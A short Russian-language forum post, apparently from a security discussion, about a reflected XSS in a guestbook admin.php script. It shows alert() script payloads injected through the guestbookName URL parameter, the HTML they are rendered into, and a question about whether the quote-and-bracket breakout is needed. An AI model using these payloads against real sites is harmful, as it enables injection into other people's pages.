Может, я чего-то не догоняю, но если заходить по адресу

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

то это преобразуется в

<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td>

Может, можно обойтись

http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ?

Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..